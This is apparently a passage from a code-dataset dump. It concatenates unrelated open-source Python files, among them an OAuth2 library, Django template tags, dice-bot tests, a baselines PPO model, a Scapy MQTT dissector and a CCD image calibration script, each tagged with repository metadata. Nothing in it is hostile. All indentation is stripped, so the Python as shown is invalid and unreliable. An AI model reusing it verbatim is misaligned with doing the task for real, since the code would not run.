if rest.startswith('//'):
hierpart = '//'
else:
hierpart = ''
host, rest = urllib.splithost(rest)
realm = schema + ':' + hierpart + host
if method == "POST" and is_form_encoded:
body = req.to_postdata()
elif method == "GET":
uri = req.to_url()
else:
headers.update(req.to_header(realm=realm))
return httplib2.Http.request(self, uri, method=method, body=body,
headers=headers, redirections=redirections,
connection_type=connection_type)
class Server(object):
"""A skeletal implementation of a service provider, providing protected
resources to requests from authorized consumers.
This class implements the logic to check requests for authorization. You
can use it with your web server or web framework to protect certain
resources with OAuth.
"""
timestamp_threshold = 300 # In seconds, five minutes.
version = OAUTH_VERSION
signature_methods = None
def __init__(self, signature_methods=None):
self.signature_methods = signature_methods or {}
def add_signature_method(self, signature_method):
self.signature_methods[signature_method.name] = signature_method
return self.signature_methods
def verify_request(self, request, consumer, token):
"""Verifies an api call and checks all the parameters."""
self._check_version(request)
self._check_signature(request, consumer, token)
parameters = request.get_nonoauth_parameters()
return parameters
def build_authenticate_header(self, realm=''):
"""Optional support for the authenticate header."""
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
def _check_version(self, request):
"""Verify the correct version of the request for this server."""
version = self._get_version(request)
if version and version != self.version:
raise Error('OAuth version %s not supported.' % str(version))
def _get_version(self, request):
"""Return the version of the request for this server."""
try:
version = request.get_parameter('oauth_version')
except:
version = OAUTH_VERSION
return version
def _get_signature_method(self, request):
"""Figure out the signature with some defaults."""
try:
signature_method = request.get_parameter('oauth_signature_method')
except:
signature_method = SIGNATURE_METHOD
try:
# Get the signature method object.
signature_method = self.signature_methods[signature_method]
except:
signature_method_names = ', '.join(self.signature_methods.keys())
raise Error('Signature method %s not supported try one of the following: %s' % (signature_method, signature_method_names))
return signature_method
def _get_verifier(self, request):
return request.get_parameter('oauth_verifier')
def _check_signature(self, request, consumer, token):
timestamp, nonce = request._get_timestamp_nonce()
self._check_timestamp(timestamp)
signature_method = self._get_signature_method(request)
try:
signature = request.get_parameter('oauth_signature')
except:
raise MissingSignature('Missing oauth_signature.')
# Validate the signature.
valid = signature_method.check(request, consumer, token, signature)
if not valid:
key, base = signature_method.signing_base(request, consumer, token)
raise Error('Invalid signature. Expected signature base '
'string: %s' % base)
def _check_timestamp(self, timestamp):
"""Verify that timestamp is recentish."""
timestamp = int(timestamp)
now = int(time.time())
lapsed = now - timestamp
if lapsed > self.timestamp_threshold:
raise Error('Expired timestamp: given %d and now %s has a '
'greater difference than threshold %d' % (timestamp, now,
self.timestamp_threshold))
class SignatureMethod(object):
"""A way of signing requests.
The OAuth protocol lets consumers and service providers pick a way to sign
requests. This interface shows the methods expected by the other `oauth`
modules for signing requests. Subclass it and implement its methods to
provide a new way to sign requests.
"""
def signing_base(self, request, consumer, token):
"""Calculates the string that needs to be signed.
This method returns a 2-tuple containing the starting key for the
signing and the message to be signed. The latter may be used in error
messages to help clients debug their software.
"""
raise NotImplementedError
def sign(self, request, consumer, token):
"""Returns the signature for the given request, based on the consumer
and token also provided.
You should use your implementation of `signing_base()` to build the
message to sign. Otherwise it may be less useful for debugging.
"""
raise NotImplementedError
def check(self, request, consumer, token, signature):
"""Returns whether the given signature is the correct signature for
the given consumer and token signing the given request."""
built = self.sign(request, consumer, token)
return built == signature
class SignatureMethod_HMAC_SHA1(SignatureMethod):
name = 'HMAC-SHA1'
def signing_base(self, request, consumer, token):
if not hasattr(request, 'normalized_url') or request.normalized_url is None:
raise ValueError("Base URL for request is not set.")
sig = (
escape(request.method),
escape(request.normalized_url),
escape(request.get_normalized_parameters()),
)
key = '%s&' % escape(consumer.secret)
if token:
key += escape(token.secret)
raw = '&'.join(sig)
return key, raw
def sign(self, request, consumer, token):
"""Builds the base signature string."""
key, raw = self.signing_base(request, consumer, token)
hashed = hmac.new(key, raw, sha)
# Calculate the digest base 64.
return binascii.b2a_base64(hashed.digest())[:-1]
class SignatureMethod_PLAINTEXT(SignatureMethod):
name = 'PLAINTEXT'
def signing_base(self, request, consumer, token):
"""Concatenates the consumer key and secret with the token's
secret."""
sig = '%s&' % escape(consumer.secret)
if token:
sig = sig + escape(token.secret)
return sig, sig
def sign(self, request, consumer, token):
key, raw = self.signing_base(request, consumer, token)
return raw
| jasonrubenstein/python_oauth2 | oauth2/__init__.py | Python | mit | 29,031 |
# We slice the array in two parts at index d, then print them
# in reverse order.
n, d = map(int, input().split())
A = list(map(int, input().split()))
print(*(A[d:] + A[:d]))
| yznpku/HackerRank | solution/practice/data-structures/arrays/array-left-rotation/solution.py | Python | mit | 177 |
from django import template
from django.utils.encoding import smart_str
from django.core.urlresolvers import reverse, NoReverseMatch
from django.db.models import get_model
from django.db.models.query import QuerySet
register = template.Library()
class GroupURLNode(template.Node):
def __init__(self, view_name, group, kwargs, asvar):
self.view_name = view_name
self.group = group
self.kwargs = kwargs
self.asvar = asvar
def render(self, context):
url = ""
group = self.group.resolve(context)
kwargs = {}
for k, v in self.kwargs.items():
kwargs[smart_str(k, "ascii")] = v.resolve(context)
if group:
bridge = group.content_bridge
try:
url = bridge.reverse(self.view_name, group, kwargs=kwargs)
except NoReverseMatch:
if self.asvar is None:
raise
else:
try:
url = reverse(self.view_name, kwargs=kwargs)
except NoReverseMatch:
if self.asvar is None:
raise
if self.asvar:
context[self.asvar] = url
return ""
else:
return url
class ContentObjectsNode(template.Node):
def __init__(self, group_var, model_name_var, context_var):
self.group_var = template.Variable(group_var)
self.model_name_var = template.Variable(model_name_var)
self.context_var = context_var
def render(self, context):
group = self.group_var.resolve(context)
model_name = self.model_name_var.resolve(context)
if isinstance(model_name, QuerySet):
model = model_name
else:
app_name, model_name = model_name.split(".")
model = get_model(app_name, model_name)
context[self.context_var] = group.content_objects(model)
return ""
@register.tag
def groupurl(parser, token):
bits = token.contents.split()
tag_name = bits[0]
if len(bits) < 3:
raise template.TemplateSyntaxError("'%s' takes at least two arguments"
" (path to a view and a group)" % tag_name)
view_name = bits[1]
group = parser.compile_filter(bits[2])
args = []
kwargs = {}
asvar = None
if len(bits) > 3:
bits = iter(bits[3:])
for bit in bits:
if bit == "as":
asvar = bits.next()
break
else:
for arg in bit.split(","):
if "=" in arg:
k, v = arg.split("=", 1)
k = k.strip()
kwargs[k] = parser.compile_filter(v)
elif arg:
raise template.TemplateSyntaxError("'%s' does not support non-kwargs arguments." % tag_name)
return GroupURLNode(view_name, group, kwargs, asvar)
@register.tag
def content_objects(parser, token):
"""
{% content_objects group "tasks.Task" as tasks %}
"""
bits = token.split_contents()
if len(bits) != 5:
raise template.TemplateSyntaxError("'%s' requires five arguments." % bits[0])
return ContentObjectsNode(bits[1], bits[2], bits[4])
| ericholscher/pinax | pinax/apps/groups/templatetags/group_tags.py | Python | mit | 3,311 |
import unittest
import unittest.mock as mock
import dice
import dice_config as dcfg
import dice_exceptions as dexc
class DiceInputVerificationTest(unittest.TestCase):
def test_dice_roll_input_wod(self):
examples = {'!r 5':[5, 10, None, 10, 8, 'wod', None],
'!r 2000':[2000, 10, None, 10, 8, 'wod', None],
'!r 2d8':[2, 8, None, None, None, 'wod', None],
'!r 7d6x4':[7, 6, None, 4, None, 'wod', None],
'!r 5000d700x700':[5000, 700, None, 700, None, 'wod', None],
'!r 15d20?20':[15, 20, None, None, 20, 'wod', None],
'!r 39d10x5?8':[39, 10, None, 5, 8, 'wod', None],
'!r 1d4x4?4':[1, 4, None, 4, 4, 'wod', None],
'!r 6d6+':[6, 6, 0, None, None, 'wod', None],
'!r 5d32+5':[5, 32, 5, None, None, 'wod', None],
'!r 17d4-12':[17, 4, -12, None, None, 'wod', None],
'!r 3d12+x12':[3, 12, 0, 12, None, 'wod', None],
'!r 10d20-7?15':[10, 20, -7, None, 15, 'wod', None],
'!r 768d37+33x5?23':[768, 37, 33, 5, 23, 'wod', None]}
for example, value in examples.items():
n, d, m, x, s, mode, cmd_msg = dice.dice_input_verification(example)
self.assertEqual([n, d, m, x, s, mode, cmd_msg], value)
def test_dice_roll_input_simple(self):
examples = {'!r 7':[7, 6, 0, None, None, 'simple', None],
'!r 2000':[2000, 6, 0, None, None, 'simple', None],
'!r 2d8':[2, 8, None, None, None, 'simple', None],
'!r 7d6x4':[7, 6, None, 4, None, 'simple', None],
'!r 8000d899x899':[8000, 899, None, 899, None, 'simple', None],
'!r 15d20?20':[15, 20, None, None, 20, 'simple', None],
'!r 39d10x5?8':[39, 10, None, 5, 8, 'simple', None],
'!r 1d4x4?4':[1, 4, None, 4, 4, 'simple', None],
'!r 6d6+':[6, 6, 0, None, None, 'simple', None],
'!r 5d32+5':[5, 32, 5, None, None, 'simple', None],
'!r 17d4-12':[17, 4, -12, None, None, 'simple', None],
'!r 3d12+x12':[3, 12, 0, 12, None, 'simple', None],
'!r 10d20-7?15':[10, 20, -7, None, 15, 'simple', None],
'!r 768d37+33x5?23':[768, 37, 33, 5, 23, 'simple', None]}
for example, value in examples.items():
n, d, m, x, s, mode, cmd_msg = dice.dice_input_verification(example, 'simple')
self.assertEqual([n, d, m, x, s, mode, cmd_msg], value)
def test_dice_options_help(self):
examples = {'!r help': [None, None, None, None, None, dcfg.mode, 'Find all available commands at:'
'\nhttps://github.com/brmedeiros/dicey9000/blob/master/README.md']}
for example, value in examples.items():
n, d, m, x, s, mode, cmd_msg = dice.dice_input_verification(example, dcfg.mode)
self.assertEqual([n, d, m, x, s, mode, cmd_msg], value)
def test_dice_options_mode(self):
examples = {'!r set wod': [None, None, None, None, None,
'wod', 'Default mode (!r n) set to World of Darksness (WoD)'],
'!r set simple': [None, None, None, None, None,
'simple', 'Default mode (!r n) set to simple (nd6)']}
for dmode in ['wod', 'simple']:
for example, value in examples.items():
n, d, m, x, s, mode, cmd_msg = dice.dice_input_verification(example, dmode)
self.assertEqual([n, d, m, x, s, mode, cmd_msg], value)
def test_dice_input_exception(self):
examples = ['!r ', '!r dmeoamdef', '!r kelf laij', '!r 2 3', '!r 6dz','!r 30dx', '!r 5d7x7?', '!r 9d10?',
'!r -10', '!r -6d8', '!r 6d8x?10', '!r 12d12x18?', '!r set ', '!r set help', '!r set akneoi',
'!r 3d6 help', '!r set 6d8?4 wod', '!r 6d12-', '!r 8d4-45?+', '!r 12d6+8-9', '!r 8d20-923+1x10?15',
'!r 6+','!r 5+2', '!r 7-', '!r 12-3', '!r 20x4', '!r 25?12', '!r 2+7x4?4', '!r 5-12x15?20']
for mode in ['wod', 'simple']:
for example in examples:
self.assertRaises(dexc.RollInputError, dice.dice_input_verification, example, mode)
def test_exploding_dice_exception(self):
examples = ['!r 5d8x9', '!r 12d60x100', '!r 1d6x9?4', '!r 78d5+x43', '!r 6d12-10x15', '!r 8d20+1x22?20']
for mode in ['wod', 'simple']:
for example in examples:
self.assertRaises(dexc.ExplodingDiceError, dice.dice_input_verification, example, mode)
def test_exploding_dice_too_small_exception(self):
examples = ['!r 5d8x1', '!r 8d6x2', '!r 3d70x1?10', '!r 10d2x2?2', '!r 78d5+x2', '!r 6d12-10x1',
'!r 8d20+1x2?20']
for mode in ['wod', 'simple']:
for example in examples:
self.assertRaises(dexc.ExplodingDiceTooSmallError, dice.dice_input_verification, example, mode)
def test_success_condition_exception(self):
examples = ['!r 2d8?9', '!r 2d15?55', '!r 65d10x6?11', '!r 32d5x5?100', '!r 78d5+?6', '!r 6d12-10?45',
'!r 8d20+1x18?200']
for mode in ['wod', 'simple']:
for example in examples:
self.assertRaises(dexc.SuccessConditionError, dice.dice_input_verification, example, mode)
def test_dice_type_exception(self):
examples = ['!r 2d0', '!r 50d0?55', '!r 6d0x6?11', '!r 32d0x5?100', '!r 78d0+?6', '!r 6d0-10?45',
'!r 8d0+1x18?200']
for mode in ['wod', 'simple']:
for example in examples:
self.assertRaises(dexc.DiceTypeError, dice.dice_input_verification, example, mode)
class DiceRollTest(unittest.TestCase):
@mock.patch('random.randint')
def test_roll_dice(self, random_call):
results = [1, 4, 6, 6, 2, 3, 5]
random_call.side_effect = results
target = dice.DiceRoll(7, 6, None, None, None)
target.roll_dice()
self.assertEqual(7, target.number_of_dice)
self.assertEqual(7, len(target.results))
for i, result in enumerate(results):
self.assertEqual(result, target.results[i])
self.assertEqual(str(result), target.formated_results[i])
@mock.patch('random.randint')
def test_total(self, random_call):
results = [1, 10, 5, 4, 10]
random_call.side_effect = results
examples = [0, 5, -10, 22, -50]
for example in examples:
target = dice.DiceRoll(5, 10, example, None, None)
target.roll_dice()
self.assertEqual(example, target.roll_modifier)
self.assertEqual(sum(results) + example, target.total)
@mock.patch('random.randint')
def test_explode(self, random_call):
results = [1, 12, 5, 4, 7, 6]
random_call.side_effect = results
target = dice.DiceRoll(6, 12, None, 12, None)
target.roll_dice()
self.assertEqual(12, target.explode_value)
self.assertEqual(len(results)+1, len(target.results))
| brmedeiros/dicey9000 | tests.py | Python | mit | 7,240 |
import tensorflow as tf
import numpy as np
from baselines.ppo2.model import Model
class MicrobatchedModel(Model):
"""
Model that does training one microbatch at a time - when gradient computation
on the entire minibatch causes some overflow
"""
def __init__(self, *, policy, ob_space, ac_space, nbatch_act, nbatch_train,
nsteps, ent_coef, vf_coef, max_grad_norm, mpi_rank_weight, comm, microbatch_size):
self.nmicrobatches = nbatch_train // microbatch_size
self.microbatch_size = microbatch_size
assert nbatch_train % microbatch_size == 0, 'microbatch_size ({}) should divide nbatch_train ({}) evenly'.format(microbatch_size, nbatch_train)
super().__init__(
policy=policy,
ob_space=ob_space,
ac_space=ac_space,
nbatch_act=nbatch_act,
nbatch_train=microbatch_size,
nsteps=nsteps,
ent_coef=ent_coef,
vf_coef=vf_coef,
max_grad_norm=max_grad_norm,
mpi_rank_weight=mpi_rank_weight,
comm=comm)
self.grads_ph = [tf.placeholder(dtype=g.dtype, shape=g.shape) for g in self.grads]
grads_ph_and_vars = list(zip(self.grads_ph, self.var))
self._apply_gradients_op = self.trainer.apply_gradients(grads_ph_and_vars)
def train(self, lr, cliprange, obs, returns, masks, actions, values, neglogpacs, states=None):
assert states is None, "microbatches with recurrent models are not supported yet"
# Here we calculate advantage A(s,a) = R + yV(s') - V(s)
# Returns = R + yV(s')
advs = returns - values
# Normalize the advantages
advs = (advs - advs.mean()) / (advs.std() + 1e-8)
# Initialize empty list for per-microbatch stats like pg_loss, vf_loss, entropy, approxkl (whatever is in self.stats_list)
stats_vs = []
for microbatch_idx in range(self.nmicrobatches):
_sli = range(microbatch_idx * self.microbatch_size, (microbatch_idx+1) * self.microbatch_size)
td_map = {
self.train_model.X: obs[_sli],
self.A:actions[_sli],
self.ADV:advs[_sli],
self.R:returns[_sli],
self.CLIPRANGE:cliprange,
self.OLDNEGLOGPAC:neglogpacs[_sli],
self.OLDVPRED:values[_sli]
}
# Compute gradient on a microbatch (note that variables do not change here) ...
grad_v, stats_v = self.sess.run([self.grads, self.stats_list], td_map)
if microbatch_idx == 0:
sum_grad_v = grad_v
else:
# .. and add to the total of the gradients
for i, g in enumerate(grad_v):
sum_grad_v[i] += g
stats_vs.append(stats_v)
feed_dict = {ph: sum_g / self.nmicrobatches for ph, sum_g in zip(self.grads_ph, sum_grad_v)}
feed_dict[self.LR] = lr
# Update variables using average of the gradients
self.sess.run(self._apply_gradients_op, feed_dict)
# Return average of the stats
return np.mean(np.array(stats_vs), axis=0).tolist()
| openai/baselines | baselines/ppo2/microbatched_model.py | Python | mit | 3,241 |
import django
# Django 1.5 add support for custom auth user model
from django.conf import settings
if django.VERSION >= (1, 5):
AUTH_USER_MODEL = settings.AUTH_USER_MODEL
else:
try:
from django.contrib.auth.models import User
AUTH_USER_MODEL = 'auth.User'
except ImportError:
raise ImportError(u"User model is not to be found.")
# location of patterns, url, include changes in 1.4 onwards
try:
from django.conf.urls import patterns, url, include
except:
from django.conf.urls.defaults import patterns, url, include
| maroux/django-relationships | relationships/compat.py | Python | mit | 563 |
from PyQt4.QtGui import *
import pypipe.formats
import pypipe.basefile
from pypipe.core import pipeline
from widgets.combobox import ComboBox
class AddFileDialog(QDialog):
def __init__(self, parent=None):
super(AddFileDialog, self).__init__(parent)
self.formats_combo = ComboBox()
self.filename_edit = QLineEdit()
self.open_button = QPushButton('Open')
self.ok_button = QPushButton('&OK')
self.cancel_button = QPushButton('&Cancel')
self.setWindowTitle('Add file')
top_layout = QVBoxLayout()
top_layout.addWidget(QLabel('<b>File format:</b>'))
top_layout.addWidget(self.formats_combo)
top_layout.addWidget(QLabel('<b>File Name:</b>'))
center_layout = QHBoxLayout()
center_layout.addWidget(self.filename_edit)
center_layout.addWidget(self.open_button)
bottom_layout = QHBoxLayout()
bottom_layout.addWidget(self.ok_button)
bottom_layout.addWidget(self.cancel_button)
layout = QVBoxLayout()
layout.addLayout(top_layout)
layout.addLayout(center_layout)
layout.addLayout(bottom_layout)
self.setLayout(layout)
self.formats_combo.add_classes_from_module(pypipe.formats)
self.connect_all()
def connect_all(self):
self.cancel_button.clicked.connect(self.reject)
self.filename_edit.textChanged.connect(self.turn_ok_button)
self.formats_combo.currentIndexChanged.connect(self.turn_ok_button)
self.ok_button.clicked.connect(self.accept)
self.open_button.clicked.connect(self.open_file)
def turn_ok_button(self):
try:
f = self.get_file()
self.ok_button.setEnabled(True)
except pypipe.basefile.FileNotExistsError:
self.ok_button.setEnabled(False)
return
if pypipe.core.pipeline.can_add_file(f):
self.ok_button.setEnabled(True)
else:
self.ok_button.setEnabled(False)
def open_file(self):
file_name = QFileDialog.getOpenFileName(self, 'Open file')
self.filename_edit.setText(file_name)
def get_file(self):
init = self.formats_combo.get_current_item()
path = str(self.filename_edit.text())
return init(path)
def exec_(self):
self.turn_ok_button()
super(AddFileDialog, self).exec_()
| ctlab/pypipe | pypipe-gui/windows/addfiledialog.py | Python | mit | 2,392 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bitcamp.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| jerrrytan/bitcamp | bitcamp/manage.py | Python | mit | 250 |
from .lattice import default_optics_mode
from .lattice import energy
from .accelerator import default_vchamber_on
from .accelerator import default_radiation_on
from .accelerator import accelerator_data
from .accelerator import create_accelerator
from .families import get_family_data
from .families import family_mapping
from .families import get_section_name_mapping
# -- default accelerator values for TS_V03 --
lattice_version = accelerator_data['lattice_version']
| lnls-fac/sirius | pymodels/TS_V03_03/__init__.py | Python | mit | 474 |
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more informations
# Copyright (C) Santiago Hernandez Ramos <[email protected]>
# This program is published under GPLv2 license
from scapy.packet import Packet, bind_layers
from scapy.fields import FieldLenField, BitEnumField, StrLenField, \
ShortField, ConditionalField, ByteEnumField, ByteField, StrNullField
from scapy.layers.inet import TCP
from scapy.error import Scapy_Exception
# CUSTOM FIELDS
# source: http://stackoverflow.com/a/43717630
class VariableFieldLenField(FieldLenField):
def addfield(self, pkt, s, val):
val = self.i2m(pkt, val)
data = []
while val:
if val > 127:
data.append(val & 127)
val /= 127
else:
data.append(val)
lastoffset = len(data) - 1
data = "".join(chr(val | (0 if i == lastoffset else 128))
for i, val in enumerate(data))
return s + data
if len(data) > 3:
raise Scapy_Exception("%s: malformed length field" %
self.__class__.__name__)
def getfield(self, pkt, s):
value = 0
for offset, curbyte in enumerate(s):
curbyte = ord(curbyte)
value += (curbyte & 127) * (128 ** offset)
if curbyte & 128 == 0:
return s[offset + 1:], value
if offset > 2:
raise Scapy_Exception("%s: malformed length field" %
self.__class__.__name__)
# LAYERS
CONTROL_PACKET_TYPE = {1: 'CONNECT',
2: 'CONNACK',
3: 'PUBLISH',
4: 'PUBACK',
5: 'PUBREC',
6: 'PUBREL',
7: 'PUBCOMP',
8: 'SUBSCRIBE',
9: 'SUBACK',
10: 'UNSUBSCRIBE',
11: 'UNSUBACK',
12: 'PINGREQ',
13: 'PINGRESP',
14: 'DISCONNECT'}
QOS_LEVEL = {0: 'At most once delivery',
1: 'At least once delivery',
2: 'Exactly once delivery'}
# source: http://stackoverflow.com/a/43722441
class MQTT(Packet):
name = "MQTT fixed header"
fields_desc = [
BitEnumField("type", 1, 4, CONTROL_PACKET_TYPE),
BitEnumField("DUP", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
BitEnumField("QOS", 0, 2, QOS_LEVEL),
BitEnumField("RETAIN", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
# Since the size of the len field depends on the next layer, we need
# to "cheat" with the length_of parameter and use adjust parameter to
# calculate the value.
VariableFieldLenField("len", None, length_of="len",
adjust=lambda pkt, x: len(pkt.payload),),
]
class MQTTConnect(Packet):
name = "MQTT connect"
fields_desc = [
FieldLenField("length", None, length_of="protoname"),
StrLenField("protoname", "",
length_from=lambda pkt: pkt.length),
ByteField("protolevel", 0),
BitEnumField("usernameflag", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
BitEnumField("passwordflag", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
BitEnumField("willretainflag", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
BitEnumField("willQOSflag", 0, 2, QOS_LEVEL),
BitEnumField("willflag", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
BitEnumField("cleansess", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
BitEnumField("reserved", 0, 1, {0: 'Disabled',
1: 'Enabled'}),
ShortField("klive", 0),
FieldLenField("clientIdlen", None, length_of="clientId"),
StrLenField("clientId", "",
length_from=lambda pkt: pkt.clientIdlen),
# Payload with optional fields depending on the flags
ConditionalField(FieldLenField("wtoplen", None, length_of="willtopic"),
lambda pkt: pkt.willflag == 1),
ConditionalField(StrLenField("willtopic", "",
length_from=lambda pkt: pkt.wtoplen),
lambda pkt: pkt.willflag == 1),
ConditionalField(FieldLenField("wmsglen", None, length_of="willmsg"),
lambda pkt: pkt.willflag == 1),
ConditionalField(StrLenField("willmsg", "",
length_from=lambda pkt: pkt.wmsglen),
lambda pkt: pkt.willflag == 1),
ConditionalField(FieldLenField("userlen", None, length_of="username"),
lambda pkt: pkt.usernameflag == 1),
ConditionalField(StrLenField("username", "",
length_from=lambda pkt: pkt.userlen),
lambda pkt: pkt.usernameflag == 1),
ConditionalField(FieldLenField("passlen", None, length_of="password"),
lambda pkt: pkt.passwordflag == 1),
ConditionalField(StrLenField("password", "",
length_from=lambda pkt: pkt.passlen),
lambda pkt: pkt.passwordflag == 1),
]
RETURN_CODE = {0: 'Connection Accepted',
1: 'Unacceptable protocol version',
2: 'Identifier rejected',
3: 'Server unavailable',
4: 'Bad username/password',
5: 'Not authorized'}
class MQTTConnack(Packet):
name = "MQTT connack"
fields_desc = [
ByteField("sessPresentFlag", 0),
ByteEnumField("retcode", 0, RETURN_CODE),
# this package has not payload
]
class MQTTPublish(Packet):
name = "MQTT publish"
fields_desc = [
FieldLenField("length", None, length_of="topic"),
StrLenField("topic", "",
length_from=lambda pkt: pkt.length),
ConditionalField(ShortField("msgid", None),
lambda pkt: (pkt.underlayer.QOS == 1
or pkt.underlayer.QOS == 2)),
StrLenField("value", "",
length_from=lambda pkt: (pkt.underlayer.len -
pkt.length - 2)),
]
class MQTTPuback(Packet):
name = "MQTT puback"
fields_desc = [
ShortField("msgid", None),
]
class MQTTPubrec(Packet):
name = "MQTT pubrec"
fields_desc = [
ShortField("msgid", None),
]
class MQTTPubrel(Packet):
name = "MQTT pubrel"
fields_desc = [
ShortField("msgid", None),
]
class MQTTPubcomp(Packet):
name = "MQTT pubcomp"
fields_desc = [
ShortField("msgid", None),
]
class MQTTSubscribe(Packet):
name = "MQTT subscribe"
fields_desc = [
ShortField("msgid", None),
FieldLenField("length", None, length_of="topic"),
StrLenField("topic", "",
length_from=lambda pkt: pkt.length),
ByteEnumField("QOS", 0, QOS_LEVEL),
]
ALLOWED_RETURN_CODE = {0: 'Success',
1: 'Success',
2: 'Success',
128: 'Failure'}
class MQTTSuback(Packet):
name = "MQTT suback"
fields_desc = [
ShortField("msgid", None),
ByteEnumField("retcode", None, ALLOWED_RETURN_CODE)
]
class MQTTUnsubscribe(Packet):
name = "MQTT unsubscribe"
fields_desc = [
ShortField("msgid", None),
StrNullField("payload", "")
]
class MQTTUnsuback(Packet):
name = "MQTT unsuback"
fields_desc = [
ShortField("msgid", None)
]
# LAYERS BINDINGS
bind_layers(TCP, MQTT, sport=1883)
bind_layers(TCP, MQTT, dport=1883)
bind_layers(MQTT, MQTTConnect, type=1)
bind_layers(MQTT, MQTTConnack, type=2)
bind_layers(MQTT, MQTTPublish, type=3)
bind_layers(MQTT, MQTTPuback, type=4)
bind_layers(MQTT, MQTTPubrec, type=5)
bind_layers(MQTT, MQTTPubrel, type=6)
bind_layers(MQTT, MQTTPubcomp, type=7)
bind_layers(MQTT, MQTTSubscribe, type=8)
bind_layers(MQTT, MQTTSuback, type=9)
bind_layers(MQTT, MQTTUnsubscribe, type=10)
bind_layers(MQTT, MQTTUnsuback, type=11)
bind_layers(MQTTConnect, MQTT)
bind_layers(MQTTConnack, MQTT)
bind_layers(MQTTPublish, MQTT)
bind_layers(MQTTPuback, MQTT)
bind_layers(MQTTPubrec, MQTT)
bind_layers(MQTTPubrel, MQTT)
bind_layers(MQTTPubcomp, MQTT)
bind_layers(MQTTSubscribe, MQTT)
bind_layers(MQTTSuback, MQTT)
bind_layers(MQTTUnsubscribe, MQTT)
bind_layers(MQTTUnsuback, MQTT)
| CodeNameGhost/shiva | thirdparty/scapy/contrib/mqtt.py | Python | mit | 8,943 |
#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
description='RESTful Nagios/Icinga Livestatus API',
author='Christoph Oelmueller',
url='https://github.com/zwopiR/lsapi',
download_url='https://github.com/zwopiR/lsapi',
author_email='[email protected]',
version='0.1',
install_requires=['flask', 'ConfigParser'],
tests_require=['mock', 'nose'],
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
scripts=[],
name='lsapi'
)
| zwopiR/lsapi | setup.py | Python | mit | 511 |
from __future__ import unicode_literals
from __future__ import absolute_import
import json
import logging
import logging.config
import os
class AlpineObject(object):
"""
Base Class of Alpine API objects
"""
#
# alpine alpine version string
#
_alpine_api_version = "v1"
_min_alpine_version = "6.2"
def __init__(self, base_url=None, session=None, token=None):
self.base_url = base_url
self.session = session
self.token = token
self._setup_logging()
# Get loggers from the configuration files(logging.json) if exists
# For detail, reference logging.json
self.logger = logging.getLogger("debug") # debug
def _add_token_to_url(self, url):
"""
Used internally to properly form URLs.
:param str url: An Alpine API URL
:return: Formatted URL
:rtype str:
"""
return str("{0}?session_id={1}".format(url, self.token))
@staticmethod
def _setup_logging(default_configuration_setting_file='logging.json',
default_level=logging.INFO,
env_key='LOG_CFG'):
"""
Sets internal values for logging through a file or an environmental variable
:param str default_configuration_setting_file: Path to logging config file. Will be overwritten by
environment variable if it exists.
:param default_level: See possible levels here: https://docs.python.org/2/library/logging.html#logging-levels
:param str env_key: Name of environment variable with logging setting.
:return: None
"""
path = default_configuration_setting_file
value = os.getenv(env_key, None)
if value:
path = value
else:
pass
if os.path.exists(path):
with open(path, 'rt') as f:
config = json.load(f)
logging.config.dictConfig(config)
else:
logging.basicConfig(level=default_level,
format="%(asctime)s %(name)s %(module)s[%(lineno)d] %(levelname)s: %(message)s")
| AlpineNow/python-alpine-api | alpine/alpineobject.py | Python | mit | 2,190 |
#
#calibrate.py
#
#calibrate fits images using darks, flats, and bias frames
#corrected image = (image - bias - k(dark-bias))/flat
#for k=1, i.e. image exp = dark exp, corrected image = (image - dark)/flat
import os
import glob
import math
import subprocess
import re
import sys
import datetime
import shutil
from decimal import Decimal
from astropy.io import fits
from astropy import wcs
from astropy import log
log.setLevel('ERROR')
from astropy import units as u
import ccdproc
import numpy as np
def logme( str ):
log.write(str + "\n")
print str
return
#MODIFY THESE FIELDS AS NEEDED!
#input path *with* ending forward slash
input_path='./'
#output path *with* ending forward slash
output_path='./calibrated/'
#log file name
log_fname = 'log.calibrate.txt'
#suffix for output files, if any...
output_suffix='.calibrated'
#used in master calibration filenames
date_suffix = datetime.datetime.now().strftime('%Y%m%d.%H%M%S')
#master bias frame
#folder with bias component frames *including* ending forward slash
bias_path='./bias/'
bias_master = 'mbias.' + date_suffix + '.fits'
#master dark frame
#folder with dark component frames *including* ending forward slash
dark_path='./dark/'
dark_is_bias_corrected = False
dark_bias = None
dark_master = 'mdark.' + date_suffix + '.fits'
#master flat frame
#folder with bias component frames *including* ending forward slash
flat_path='./flat/'
flat_is_bias_corrected = False
flat_bias = None
flat_is_dark_corrected = False
flat_dark = None
flat_ave_exptime = 0
flat_master = 'mflat.' + date_suffix + '.fits'
#name of exposure variable in FITS header file
exposure_label='EXPTIME'
log=open(log_fname, 'a+')
#trim image? set range here, or set to '' to disable
trim_range = ''
if(len(sys.argv) == 5):
naxis1_start = int(sys.argv[1])
naxis1_end = int(sys.argv[2])
naxis2_start = int(sys.argv[3])
naxis2_end = int(sys.argv[4])
trim_range = '[%d:%d, %d:%d]'%(naxis1_start, naxis1_end, naxis2_start, naxis2_end) #starts at 1, inclusive
logme('Trimming images to NAXIS1=%d to %d, NAXIS2=%d to %d.'%(naxis1_start, naxis1_end, naxis2_start, naxis2_end))
#does output directory exist? If not, create it
try:
os.mkdir(output_path)
except:
pass
#bias
#create master bias frame
im=glob.glob(bias_path+'*.fits')+glob.glob(bias_path+'*.fit')
if(len(im) <= 0):
logme('Error. Bias calibration frame(s) not found (%s).' % bias_path)
log.close()
sys.exit(-1)
biases = None
for i in range(0,len(im)):
if(biases):
biases += ','+im[i]
else:
biases = im[i]
#if there is just one, make it two of the same for the combine!
if (len(im) == 1):
biases += ','+im[0]
bias_path += 'master/'
try:
os.mkdir(bias_path)
except:
pass
bias_path += bias_master
logme('Creating master bias frame (%s)...'%(bias_path))
bias = ccdproc.combine(biases, method='median', unit='adu', add_keyword=False)
#trim it, if necessary
if(len(trim_range) > 0):
